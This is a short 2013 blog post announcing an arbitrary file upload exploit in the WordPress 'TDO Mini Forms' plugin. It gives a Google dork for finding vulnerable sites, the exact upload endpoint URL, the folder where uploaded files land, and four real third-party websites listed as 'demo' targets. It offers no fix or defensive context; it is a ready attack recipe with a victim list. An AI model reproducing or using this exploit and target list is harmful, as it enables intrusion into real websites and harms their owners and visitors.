12 thg 3, 2013

WordPress TDO Mini Forms Arbitrary File Upload {VERY EASY}

Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability

Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index"

Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/

Version: All

Tested on: 2.x.x to 3.x.x




Exploit:

site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=


Uploaded files go to:

site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.*

Demo sites: 

http://waqtnews.tv/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://funnyfuntoosh.com/blogs/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://ideabank.utm.my/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://www.mormonmissionprep.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

Không có nhận xét nào:

Đăng nhận xét